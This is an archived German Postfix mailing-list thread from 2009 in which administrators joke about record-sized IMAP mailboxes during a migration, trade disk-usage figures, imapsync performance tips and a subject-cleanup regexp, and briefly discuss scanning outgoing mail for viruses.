5 20:53:03 2009 From: listen at papernet.de (Matthias Ebner) Date: Wed, 5 Aug 2009 20:53:03 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908052030.50317.p.heinlein@heinlein-support.de> Message-ID: <001201ca15fd$f7200360$0601a8c0@emnpc2> Peer Heinlein schrieb am Mittwoch, den 5. August 2009 > Stand da neulich bei einem Auftritt im Backstage OTOT: Was macht ein Peer Heinlein bei Viva? Hast du deine neue Single vorgestellt? ;-) BTT: Solche Mailboxen sind mir bisher zum Glück erspart geblieben. message_size_limit, quota und expire sind schon tolle Erfindungen. Aber ich habe hier auch einen Kollegen sitzen, dem selbst der Speicherplatz von zwei Google-Accounts nicht ausreicht. Mir absolut unverständlich, wie man soviele Mails hamstern kann. From cite+postfix-buch at incertum.net Wed Aug 5 21:01:49 2009 From: cite+postfix-buch at incertum.net (Stefan =?utf-8?Q?F=C3=B6rster?=) Date: Wed, 5 Aug 2009 21:01:49 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908052030.50317.p.heinlein@heinlein-support.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> Message-ID: <20090805190149.GA5698@mail.incertum.net> Hallo Peer, ganz ruhig. Denk' an was Schönes. * Peer Heinlein : > Rekordhalter ist -- soweit ich es sehe -- jemand mit einer 1,7 GByte > großen INBOX, > 15.000 Nachrichten in der INBOX und > 30.000 Nachrichten > im Spamfilter. Außerdem hat die INBOX Mails mit 120 MByte pro Mail (wie > auch immer die da jemals reingekommen sind). Ich habe seit Mitte 2000 noch jede Mail, die ich empfangen oder gesendet habe - Minus Mailinglisten, Newsletter, Spam. 26501 Nachrichten, 2.1 GB. Ciao Stefan P.S: Und dann hatte ich mal /var in ein IMAP-Postfach geschoben. *hust* -- Stefan Förster http://www.incertum.net/ Public Key: 0xBBE2A9E9 FdI #266: Allradantrieb - Allradantrieb bedeutet, dass man dort stecken bleibt, wo der Abschleppwagen nicht hinkommt. From p.heinlein at heinlein-support.de Wed Aug 5 21:05:32 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 5 Aug 2009 21:05:32 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <001201ca15fd$f7200360$0601a8c0@emnpc2> References: <001201ca15fd$f7200360$0601a8c0@emnpc2> Message-ID: <200908052105.32765.p.heinlein@heinlein-support.de> Am Mittwoch, 5. August 2009 schrieb Matthias Ebner: > Aber ich habe hier auch einen Kollegen sitzen, dem selbst der > Speicherplatz von zwei Google-Accounts nicht ausreicht. > Mir absolut unverständlich, wie man soviele Mails hamstern kann. Genau. Darum lege ich mir ja einfach 20 IMAP-Accounts parallel an, dann fallen die 2 GB pro Account nicht so auf. Nee, nee, just GAGA'ing. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From ad+lists at uni-x.org Wed Aug 5 21:06:19 2009 From: ad+lists at uni-x.org (Alexander Dalloz) Date: Wed, 05 Aug 2009 21:06:19 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908052030.50317.p.heinlein@heinlein-support.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> Message-ID: <4A79D82B.5040909@uni-x.org> Peer Heinlein schrieb: > > Hi Ihrs. > > Wer hält hier eigentlich den Postfach-Mail-Volumen-Rekord? > > Ich migriere gerade einen Kundenserver und habe es reihenweise mit > Postfächern > 15.000 Mails, diversen Mails > 80 MByte zu tun und > Trash/Spamfoldern im dicken fünfstelligen Bereich, die bis 2004 > zurückreichen. > > Rekordhalter ist -- soweit ich es sehe -- jemand mit einer 1,7 GByte > großen INBOX, > 15.000 Nachrichten in der INBOX und > 30.000 Nachrichten > im Spamfilter. Außerdem hat die INBOX Mails mit 120 MByte pro Mail (wie > auch immer die da jemals reingekommen sind). > > Also Exchange-Postfächer > 2 GByte kenne ich ja, aber diese Mailgrößen und > diese irre Anzahl von E-Mails ist schon nicht schlecht. Mich würde interessieren, was für ein Storage & Access Server das ist und wie die Leistung aussieht. Ich habe einen cyrus-imapd laufen und den kümmert folgende Zahl wenig: $ find . -type f -name "[0-9]*." | wc -l 244190 $ du -sh . 4,2G . Ist mein Mailinglistenaccount, dem ich aber auch schon mit Löschwut zu Leibe gerückt bin. Nur der Postfixbuch-users Folder ist noch vollständig seit Abobeginn $ find Mailinglisten/Postfix -type f -name "[0-9]*." | wc -l 22862 Große Mails habe ich naturgemäß nicht und Spam lösche ich immer direkt weg. Also nur ein halber Mailmessie ;) > Eigentlich mal ein Fall für ein Postfachquartett. So statt Motor und > Leistung wie beim Autoquartett geht es nach > > Anzahl IMAP-Folder: > Anzahl Mails gesamt: > Anzahl Mails in INBOX: > Anzahl Mails in Spam-Folder: > Größte E-Mail: > Größte Anzahl von AW: AW: AW: AW: AW im Betreff: > Einfachstes Passwort: > Kompliziertestes Passwort: > Anzahl POP3-Logins pro Stunde: > Anzahl an "Mail-kam-nicht-an"-Fehlalarmen am Helpdesk: > > > Mann, mann, mann, mann. Ich werde hier gerade gaga. A propos Gaga. Stand > da neulich bei einem Auftritt im Backstage so ein aufgetakeltes Etwas mit > Body-Guard und Make-Up-Assistenten, die permanent am Etwas rumpuderte, > das ganze mit überblondem Haar und dicker Sonnenbrille. Erst dachte ich, > die hat sich verkleidet weil's 'ne Karneval-Aufzeichnung auf VIVA war. > Aber dann flippte das Teenie-Publikum aus während sie Quark im Studio > redete und feierte "Lady Gaga", die ich bis dato noch gar nicht kannte > und noch nicht mal zu würdigen weiß. Mann, mann, mann. Ich werd alt. Interessant welche Leute bei Deinen Vorträgen inzwischen die Einheizer und Vorgruppe machen. Respekt! > So. Gaga-Gaga-Mode erreicht. imapsync arbeitet sich seit 5 Stunden (!) an > einem einzelnen Postfach ab. Das arme imapsync. Tut mir irgendwie leid. > Ist ja auch nur ein Perl-Script, das arme Ding. Kein Wunder daß neulich > beide Controller des SANs bei diesen Daten Selbstmord begangen haben und > simultan abgestürzt sind. Sag mal, wie viel RAM verbrät der imapsync Prozess dabei? Gerade bei so großen Mailboxen habe ich die Erfahrung gemacht, das er gar nicht genug RAM/Swap haben kann. > Dong. Ende der Durchsage. > > Peer Beste Grüße Alexander From timo.schoeler at riscworks.net Wed Aug 5 21:08:19 2009 From: timo.schoeler at riscworks.net (Timo Schoeler) Date: Wed, 05 Aug 2009 21:08:19 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <20090805190149.GA5698@mail.incertum.net> References: <200908052030.50317.p.heinlein@heinlein-support.de> <20090805190149.GA5698@mail.incertum.net> Message-ID: <4A79D8A3.1050302@riscworks.net> thus Stefan Förster spake: > Hallo Peer, > > ganz ruhig. Denk' an was Schönes. > > * Peer Heinlein : >> Rekordhalter ist -- soweit ich es sehe -- jemand mit einer 1,7 GByte >> großen INBOX, > 15.000 Nachrichten in der INBOX und > 30.000 Nachrichten >> im Spamfilter. Außerdem hat die INBOX Mails mit 120 MByte pro Mail (wie >> auch immer die da jemals reingekommen sind). > > Ich habe seit Mitte 2000 noch jede Mail, die ich empfangen oder > gesendet habe - Minus Mailinglisten, Newsletter, Spam. > > 26501 Nachrichten, 2.1 GB. > > > Ciao > Stefan > > P.S: Und dann hatte ich mal /var in ein IMAP-Postfach geschoben. *hust* tydirium# du -hs 2.6G . tydirium# du -a | wc -l 109340 ^ files & folders [cyrus, da geht das, pro mail ein file] Angesichts der ganzen Schw*nzverlägnerungsspams stellt sich die Frage, was derlei 'Vergleich' sollen ;D HTH From p.heinlein at heinlein-support.de Wed Aug 5 21:17:14 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 5 Aug 2009 21:17:14 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <20090805190149.GA5698@mail.incertum.net> References: <200908052030.50317.p.heinlein@heinlein-support.de> <20090805190149.GA5698@mail.incertum.net> Message-ID: <200908052117.14449.p.heinlein@heinlein-support.de> Am Mittwoch, 5. August 2009 schrieb Stefan Förster: > Ich habe seit Mitte 2000 noch jede Mail, die ich empfangen oder > gesendet habe - Minus Mailinglisten, Newsletter, Spam. > > 26501 Nachrichten, 2.1 GB. Na gut, jetzt wo Du's sagst fällt mir auf... ich habe hier noch alle 42.268 Nachrichten dieser Mailingliste seit Gründung der Liste. Aber das ist wenigstens zu 100% Content. Das andere hier ist der Spamfolder mit 99,9% Spam, das ist ja das verrückte. Und nach der Migration werden die ganzen User den ganzen Kram vom neuen Server nochmal neu per IMAP runterladen. Ein paar Hundert GByte Spam-Schrott. Der arme Server. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From p.heinlein at heinlein-support.de Wed Aug 5 21:56:25 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 5 Aug 2009 21:56:25 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <4A79D82B.5040909@uni-x.org> References: <200908052030.50317.p.heinlein@heinlein-support.de> <4A79D82B.5040909@uni-x.org> Message-ID: <200908052156.26231.p.heinlein@heinlein-support.de> Am Mittwoch, 5. August 2009 schrieb Alexander Dalloz: > Mich würde interessieren, was für ein Storage & Access Server das ist > und wie die Leistung aussieht. Naja, kann man so nicht sagen, da geht es um ein paar Tausend solcher Accounts. > Sag mal, wie viel RAM verbrät der imapsync Prozess dabei? Gerade bei so > großen Mailboxen habe ich die Erfahrung gemacht, das er gar nicht genug > RAM/Swap haben kann. Jau, da gibt's imapsync-prozesse mit rund 750 MByte dabei. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From p.heinlein at heinlein-support.de Wed Aug 5 21:58:55 2009 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Wed, 5 Aug 2009 21:58:55 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <4A79D8A3.1050302@riscworks.net> References: <200908052030.50317.p.heinlein@heinlein-support.de> <20090805190149.GA5698@mail.incertum.net> <4A79D8A3.1050302@riscworks.net> Message-ID: <200908052158.55753.p.heinlein@heinlein-support.de> Am Mittwoch, 5. August 2009 schrieb Timo Schoeler: > Angesichts der ganzen Schw*nzverlägnerungsspams stellt sich die Frage, > was derlei 'Vergleich' sollen ;D Die sollen nichts, nur Spaßmachen weil mir vom Logfile-zugucken hier mächtig langweilig wird und ich gerade die Liste zulaber. Just my 2-GAGA. Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein  -- Sitz: Berlin From stefan at webetc.de Wed Aug 5 22:20:00 2009 From: stefan at webetc.de (Stefan Dorn) Date: Wed, 05 Aug 2009 22:20:00 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <4A79D82B.5040909@uni-x.org> References: <200908052030.50317.p.heinlein@heinlein-support.de> <4A79D82B.5040909@uni-x.org> Message-ID: <4A79E970.40103@webetc.de> Alexander Dalloz schrieb: > Peer Heinlein schrieb: > >> Hi Ihrs. >> >> Wer hält hier eigentlich den Postfach-Mail-Volumen-Rekord? >> > Mich würde interessieren, was für ein Storage & Access Server das ist > und wie die Leistung aussieht. > > bei mir ein betagter p4 3ghz, 2gb ram und 2x 150gb 10k u/min s-ata > Ich habe einen cyrus-imapd laufen und den kümmert folgende Zahl wenig: > > hier ein dovecot > $ find . -type f -name "[0-9]*." | wc -l > 244190 > > $ du -sh . > 4,2G . > und nun... *trommelwirbel* ...die groesste mailbox hat: $ find . -type f | wc -l 1095884 $ du -sh . 40G . gruss stefan From thomas at gelf.net Wed Aug 5 23:12:43 2009 From: thomas at gelf.net (Thomas Gelf) Date: Wed, 05 Aug 2009 23:12:43 +0200 Subject: [Postfixbuch-users] Postfach[doping]rekord Gaga-Gaga-Gaga In-Reply-To: <200908052030.50317.p.heinlein@heinlein-support.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> Message-ID: Hey Kinder! Peer Heinlein schrieb: > Wer hält hier eigentlich den Postfach-Mail-Volumen-Rekord? Kann leider nicht mitspielen, werde hier noch die halbe Nacht in Gesellschaft einiger SIP-Proxys festsitzen. Aber wenn jemand wirklich gewinnen will und bereit ist, etwas dafür zu investieren, dann läuft das wie folgt: - mir 'nen GinTonic vorbeibringen (oder zwei... oder drei...) - blase dem dann als Belohnung mit 'nem Dreizeiler unsere Quarantäne ins Postfach - das dürfte eine 2-3stellige GB-Zahl sein, mit Millionen von Mails - und wenn das nicht reicht: noch ein paar GinTonic, und ich lege noch was drauf: einen Loop :D In diesem Sinne: Prost! From driessen at fblan.de Thu Aug 6 01:01:59 2009 From: driessen at fblan.de (Uwe Driessen) Date: Thu, 6 Aug 2009 01:01:59 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908052117.14449.p.heinlein@heinlein-support.de> References: <200908052030.50317.p.heinlein@heinlein-support.de><20090805190149.GA5698@mail.incertum.net> <200908052117.14449.p.heinlein@heinlein-support.de> Message-ID: <002b01ca1620$bcab54f0$0565a8c0@uwe> On Behalf Of Peer Heinlein > Am Mittwoch, 5. August 2009 schrieb Stefan Förster: > > > Ich habe seit Mitte 2000 noch jede Mail, die ich empfangen oder > > gesendet habe - Minus Mailinglisten, Newsletter, Spam. > > > > 26501 Nachrichten, 2.1 GB. > > Na gut, jetzt wo Du's sagst fällt mir auf... ich habe hier noch alle > 42.268 Nachrichten dieser Mailingliste seit Gründung der Liste. > > Aber das ist wenigstens zu 100% Content. Das andere hier ist der > Spamfolder mit 99,9% Spam, das ist ja das verrückte. > > Und nach der Migration werden die ganzen User den ganzen Kram vom neuen > Server nochmal neu per IMAP runterladen. Ein paar Hundert GByte > Spam-Schrott. Der arme Server. Wieso denn der arme Server?? Der User muß ja all die Mails wieder beantworten und schnell überprüfen wo er die blauen pillchen am günstigsten mit der größten Wirkung bestellen kann. Er wird auch sicherlich wieder 14 Trage benötigen alle Fleischmail's auf Existenz der Webseite zu prüfen. Ihm wird auch wieder die eine oder andere Mail ins Auge STECHEN von längst verflossenen Freundinnen die er abserviert hat und so manche unbeantwortete Mail von Verabredungen finden die aber leider auch schon längst nicht mehr gültig sind (sofern da nicht steht "kommst du am nächsten Mittwoch auf ein Bierchen vorbei sag bitte bescheid wenn es nicht klappt" usw. usw. Sind das evtl. vergessene Catchall die man irgendwann mal haben musste weil das schick war und keiner hat die Konten wirklich mal benutzt bzw. abgerufen? Bei so was bin ich gemein *gg ich such mir ein benutztes Postfach des Kunden raus (vorzugsweise das vom Chef) und schieb die ganzen Mails dort rein.(BOFH mäßig*g) > > Peer > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: +49 06708 / 660045 Fax: +49 06708 / 661397 From christian at bricart.de Thu Aug 6 01:53:05 2009 From: christian at bricart.de (Christian Bricart) Date: Thu, 06 Aug 2009 01:53:05 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908052030.50317.p.heinlein@heinlein-support.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> Message-ID: <4A7A1B61.10209@bricart.de> Peer Heinlein schrieb: > [..] > Rekordhalter ist -- soweit ich es sehe -- jemand mit einer 1,7 GByte > großen INBOX, > 15.000 Nachrichten in der INBOX und > 30.000 Nachrichten > im Spamfilter. Außerdem hat die INBOX Mails mit 120 MByte pro Mail (wie > auch immer die da jemals reingekommen sind). > > Also Exchange-Postfächer > 2 GByte kenne ich ja, aber diese Mailgrößen und > diese irre Anzahl von E-Mails ist schon nicht schlecht. ... lies weiter unten ;-) > > Eigentlich mal ein Fall für ein Postfachquartett. So statt Motor und > Leistung wie beim Autoquartett geht es nach > > Anzahl IMAP-Folder: ca. 12.000 bei knapp 3000 Usern > Anzahl Mails gesamt: .. "find -type f | wc -l" muss glaub ich noch bis morgen daran knabbern.. da es eine eigene Partition ist, gehe ich mal über "df": 326GB - 9.125.700 Inodes in Benutzung (<- sollten ja dann quasi auch die uniquen Files sein - zusätzlich die lokalen CC/BCC, die als Hardlink existieren) Was ehrlich gsagt auch sehr interessant ist, da grob geschätzt 80-85% der User POPpen und ihre Box eigentlich leer sein müsste.. die können doch nicht alle "leave mail on Server" haben.. was ist denn da Standard im Auskuck..? > Anzahl Mails in INBOX: schau ich jetzt nicht mal nach... aber letzen Monat habe ich von einem User seinen Sent-Folder aufgeräumt, nachdem er sich bei der Hotline gemeldet hat, dass der Webmailer in einen Timeout und sowohl sein Thunderbird als auch sein Schneller Auskuck den Ordner nicht anzeigen kann... Ergebnis: 1,2 Mio Mails im Sent-Ordner... jede Mail knapp 900-fach gehardlinkt.. keine Ahnung, wie man das nur über IMAP-Zugriff hinbekommt... > Anzahl Mails in Spam-Folder: definitiv bei den POPpern mehr als bei den IMAPpern.. die sehen den Folder ja gar nicht ;-) > Größte E-Mail: sollte eigentlich die am Postfix eingestellten 90MB (<- !!) nicht überschreiten.. > Größte Anzahl von AW: AW: AW: AW: AW im Betreff: Das wäre in der Tat eine nette Statistik ;-) Aber die Pseudo-Regexp müsste auf "Re|AW|Antwort|Wrtl|Fwd|..." erweitert werden.. > Einfachstes Passwort: ich tippe mal ohne Nachzuschauen: "geheim" > Kompliziertestes Passwort: mein eigenes bestimmt ;-) > Anzahl POP3-Logins pro Stunde: hochgerechnet bei knapp 3000 Accounts, wenn jeder alle 5-10 Minuten pollt... ööhh... ja... das wären dann wohl ca. 18.000-36.000... ;-) Aber ich denke realistisch ist wohl so um die 8.000-10.000.. > Anzahl an "Mail-kam-nicht-an"-Fehlalarmen am Helpdesk: zu viele... > [..] Grüsse Christian From Hullen at t-online.de Wed Aug 5 23:21:00 2009 From: Hullen at t-online.de (Helmut Hullen) Date: 05 Aug 2009 23:21:00 +0200 Subject: [Postfixbuch-users] Postfach[doping]rekord Gaga-Gaga-Gaga In-Reply-To: Message-ID: Hallo, Thomas, Du meintest am 05.08.09 zum Thema Re: [Postfixbuch-users] Postfach[doping]rekord Gaga-Gaga-Gaga: > Aber wenn jemand wirklich gewinnen will und bereit ist, etwas dafür zu > investieren, dann läuft das wie folgt: > - mir 'nen GinTonic vorbeibringen (oder zwei... oder drei...) [...] > In diesem Sinne: Prost! Und bitteschön ein Glas für den Server! Viele Gruesse! Helmut From lists at puersten.de Thu Aug 6 08:15:30 2009 From: lists at puersten.de (=?ISO-8859-1?Q?Oliver_P=FCrsten?=) Date: Thu, 06 Aug 2009 08:15:30 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A79B38E.9030302@puersten.de> References: <4A79B38E.9030302@puersten.de> Message-ID: <4A7A7502.30206@puersten.de> Oliver Pürsten schrieb: > Hallo Zusammen, > > mich würde mal wieder, wie schon so oft, Eure Meinung zu einem Thema > interessieren. > > Diesmal: > Das scannen von ausgehenden Emails. > > Wie haltet Ihr das bei Euch? > Scannt Ihr eure Mails ausgehend auch auf SPAM bzw. Viren? > > Im Grunde ist es ja so das der Mailversand von einer vertrauenswürdigen > Quelle > statt findet und man ja erstmal davon ausgehen kann das von dort kein > SPAM bzw. > keine Viren kommen. > > Zudem macht es ja auch einen Performance Unterschied ob ich die Emails > erst noch > durch Amavis schicken muss oder postfix sie gleich zustellen kann. > > Freue mich wie immer auf Eure Meinung und > eine schöne große Diskussion zum Thema ! > > Viele Grüße > Oliver > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listen.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users ok ok, hab auch nur mal nen gaaaaaanz kurzen Moment drüber nachgedacht. Ihr habt mich alle schnell davon überzeugt das das Murgs auf Kosten der anderen ist, also verwerfe ich den Gedanken gleich mal wieder... Gruß Oliver From timo.schoeler at riscworks.net Thu Aug 6 09:04:39 2009 From: timo.schoeler at riscworks.net (Timo Schoeler) Date: Thu, 06 Aug 2009 09:04:39 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <002b01ca1620$bcab54f0$0565a8c0@uwe> References: <200908052030.50317.p.heinlein@heinlein-support.de><20090805190149.GA5698@mail.incertum.net> <200908052117.14449.p.heinlein@heinlein-support.de> <002b01ca1620$bcab54f0$0565a8c0@uwe> Message-ID: <4A7A8087.9060000@riscworks.net> thus Uwe Driessen spake: > On Behalf Of Peer Heinlein >> Am Mittwoch, 5. August 2009 schrieb Stefan Förster: >> >>> Ich habe seit Mitte 2000 noch jede Mail, die ich empfangen oder >>> gesendet habe - Minus Mailinglisten, Newsletter, Spam. >>> >>> 26501 Nachrichten, 2.1 GB. >> Na gut, jetzt wo Du's sagst fällt mir auf... ich habe hier noch alle >> 42.268 Nachrichten dieser Mailingliste seit Gründung der Liste. >> >> Aber das ist wenigstens zu 100% Content. Das andere hier ist der >> Spamfolder mit 99,9% Spam, das ist ja das verrückte. >> >> Und nach der Migration werden die ganzen User den ganzen Kram vom neuen >> Server nochmal neu per IMAP runterladen. Ein paar Hundert GByte >> Spam-Schrott. Der arme Server. > > Wieso denn der arme Server?? > > Der User muß ja all die Mails wieder beantworten und schnell überprüfen wo er die blauen > pillchen am günstigsten mit der größten Wirkung bestellen kann. Muß er ja auch haben, sonst kann er den heutigen Wettbewerb (s.u.a. Doku in der ARD gestern Abend) nicht gewinnen. > Er wird auch sicherlich > wieder 14 Trage benötigen alle Fleischmail's auf Existenz der Webseite zu prüfen. Korrekt. > Ihm wird auch wieder die eine oder andere Mail ins Auge STECHEN von längst verflossenen > Freundinnen die er abserviert hat Moment. Bei der heutig inflationären Anzahl an Coitusbekanntschaften des/der ein oder anderen kann man ja nicht wirklich von 'Freundinnen' sprechen, oder? Das Problem ergibt sich auch nicht mehr so wie in den 80ern und 90ern (Hörensagen), da heute ja nichtmal mehr nach dem Vornamen gefragt wird, auch wenn dieser /eigentlich/ 'voll porno'-mäig beim vorgetäuschten krakeelt werden müßte. Nichtmal die Stillosigkeit wird heute noch stilvoll begangen. > und so manche unbeantwortete Mail von Verabredungen > finden die aber leider auch schon längst nicht mehr gültig sind (sofern da nicht steht > "kommst du am nächsten Mittwoch auf ein Bierchen vorbei sag bitte bescheid wenn es nicht > klappt" usw. usw. ONS-Anbahnungen per eMail sind viel zu unflexibel, SMS ist besser. Das Zeitfenster zur Bestellbestätigung schließt sich ja meistens nach spätestens zwei Minuten (in Abhängigkeit der Kandidatenliste der 'Dame' resp. der Anzahl der... ach, lassen wir das) :D > Sind das evtl. vergessene Catchall die man irgendwann mal haben musste weil das schick war > und keiner hat die Konten wirklich mal benutzt bzw. abgerufen? > > Bei so was bin ich gemein *gg ich such mir ein benutztes Postfach des Kunden raus > (vorzugsweise das vom Chef) und schieb die ganzen Mails dort rein.(BOFH mäßig*g) > > >> Peer >> > > > Mit freundlichen Grüßen > > Drießen SCNR, Timo :) From r.lemmermann at tcu.de Thu Aug 6 08:51:08 2009 From: r.lemmermann at tcu.de (R. Lemmermann) Date: Thu, 06 Aug 2009 08:51:08 +0200 Subject: [Postfixbuch-users] Virenscan + Spamscan bei ausgehenden Mails In-Reply-To: <4A7A7502.30206@puersten.de> References: <4A79B38E.9030302@puersten.de> <4A7A7502.30206@puersten.de> Message-ID: <4A7A7D5C.9080401@tcu.de> Hallo Mal ganz platt gefragt: Wo häng ich das in der Postfix-Konfiguration ein? Gruss Reiner From s.schmidt at jacobs-university.de Thu Aug 6 09:24:29 2009 From: s.schmidt at jacobs-university.de (Stefan Schmidt) Date: Thu, 6 Aug 2009 09:24:29 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908052030.50317.p.heinlein@heinlein-support.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> Message-ID: <200908060924.32592.s.schmidt@jacobs-university.de> Hallo, On Wednesday 05 August 2009 20:30:50 Peer Heinlein wrote: > Wer hält hier eigentlich den Postfach-Mail-Volumen-Rekord? Ich nicht, aber Deine Zahlen sehen vergleichsweise Lächerlich aus. > Ich migriere gerade einen Kundenserver und habe es reihenweise mit > Postfächern > 15.000 Mails, diversen Mails > 80 MByte zu tun und > Trash/Spamfoldern im dicken fünfstelligen Bereich, die bis 2004 > zurückreichen. > > Rekordhalter ist -- soweit ich es sehe -- jemand mit einer 1,7 GByte > großen INBOX, > 15.000 Nachrichten in der INBOX und > 30.000 > Nachrichten im Spamfilter. Außerdem hat die INBOX Mails mit 120 MByte > pro Mail (wie auch immer die da jemals reingekommen sind). Meine Mailbox privat liegt bei 5.5GB, dienstlich um 4 GB. na und? > So. Gaga-Gaga-Mode erreicht. imapsync arbeitet sich seit 5 Stunden > (!) an einem einzelnen Postfach ab. Das arme imapsync. Tut mir > irgendwie leid. Ist ja auch nur ein Perl-Script, das arme Ding. Kein > Wunder daß neulich beide Controller des SANs bei diesen Daten > Selbstmord begangen haben und simultan abgestürzt sind. Aaaaaber. Machst Du da evtl. mit SSL rum? Wenn immer Du kannst, solltest Du bei imapsync auf SSL zu den Mailservern verzichten. Ich weiss, das steht nirgendwo, ausser in der ML mal kurz. Mit SSL funktioniert alles, aber grosse Mails werden so quälend langsam, ab 10MB merkt man das. Ich hatte einige mit rund 40MB und eine mit 70MB, da geht dann schon mal eine Stunde drauf für eine Mail. Grund: intern wird in 4096 Byte Blöcken gelesen und dann der Puffer mittels mmap in hin- und herkopiert, um den Puffer zu vergrössern, eben um 4096 Byte. Ab 10 MB fällt das dann zeitlich spürbar ins Gewicht. Ohne SSL: wuuuuusch! So denn, Stean -- Stefan Schmidt Network Manager Jacobs University Bremen gGmbH Campus Ring 1 | 28759 Bremen | Germany Commercial registry: Amtsgericht Bremen, HRB 18117 CEO: Prof. Dr. Joachim Treusch Chair Board of Governors: Prof. Dr. Karin Lochte -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : signature.asc Dateityp : application/pgp-signature Dateigröße : 197 bytes Beschreibung: This is a digitally signed message part. URL : From Ralf.Hildebrandt at charite.de Thu Aug 6 09:44:59 2009 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Thu, 6 Aug 2009 09:44:59 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908052030.50317.p.heinlein@heinlein-support.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> Message-ID: <20090806074459.GE27540@charite.de> * Peer Heinlein : > Wer hält hier eigentlich den Postfach-Mail-Volumen-Rekord? Kennst du du2rrd? > Ich migriere gerade einen Kundenserver und habe es reihenweise mit > Postfächern > 15.000 Mails, diversen Mails > 80 MByte zu tun und > Trash/Spamfoldern im dicken fünfstelligen Bereich, die bis 2004 > zurückreichen. Bei mir sind die Top-Sünder: 10.6GB 9.0GB 8.6GB 4.4GB 2.8GB 2.1GB 2.1GB 1.9GB 1.9GB > Rekordhalter ist -- soweit ich es sehe -- jemand mit einer 1,7 GByte > großen INBOX, > 15.000 Nachrichten in der INBOX und > 30.000 Nachrichten > im Spamfilter. Außerdem hat die INBOX Mails mit 120 MByte pro Mail (wie > auch immer die da jemals reingekommen sind). Ich persönlich würde den Spamfilter in den Orkus kippen, zumindest alles was älter ist als 2 Monate. Auch schmeisse ich beim IMAPsync alles weg, was /deleted Flags hat. > Anzahl IMAP-Folder: Das ist ja eher ein Qualitätsindiz. Wer VIEL Mail in VIELEN Ordnern hat, hat ja eine Struktur! > Größte Anzahl von AW: AW: AW: AW: AW im Betreff: Dafür habe ich eine regexp, die das fixt: # Outlook Re: AW: Re: AW: Muell reparieren! /^Subject: ((re|aw):\s+){2,}(.+)/ REPLACE Subject: Re: $3 -- Ralf Hildebrandt Geschäftsbereich IT | Abteilung Netzwerk Charité - Universitätsmedizin Berlin Campus Benjamin Franklin Hindenburgdamm 30 | D-12203 Berlin Tel. +49 30 450 570 155 | Fax: +49 30 450 570 962 ralf.hildebrandt at charite.de | http://www.charite.de From atann at alphasrv.net Thu Aug 6 09:37:16 2009 From: atann at alphasrv.net (Andre Tann) Date: Thu, 6 Aug 2009 09:37:16 +0200 Subject: [Postfixbuch-users] Postfachrekord Gaga-Gaga-Gaga In-Reply-To: <200908060924.32592.s.schmidt@jacobs-university.de> References: <200908052030.50317.p.heinlein@heinlein-support.de> <200908060924.32592.s.schmidt@jacobs-university.de> Message-ID: <200908060937.16687@inter.netz> Stefan Schmidt, Donnerstag 06 August 2009: > Meine Mailbox privat liegt bei 5.5GB, dienstlich um 4 GB. na und? Äh... ich hab hier Kunden, die schicken ständig Druckunterlagen hin und her. Jede Mail 10 MB, das summiert sich. 20 GB, auch mal 30 GB für die Mailbox, das kommt dauernd vor. Das ist doch gar nicht so furchtbar viel...? -- Andre Tann From timo.schoeler at riscworks.net Thu Aug 6 09:53:05 2009 From: timo.schoeler at riscworks.net (Timo Schoeler) Date: Thu, 06 Aug 2009 09:53:05 +0200 Subject: 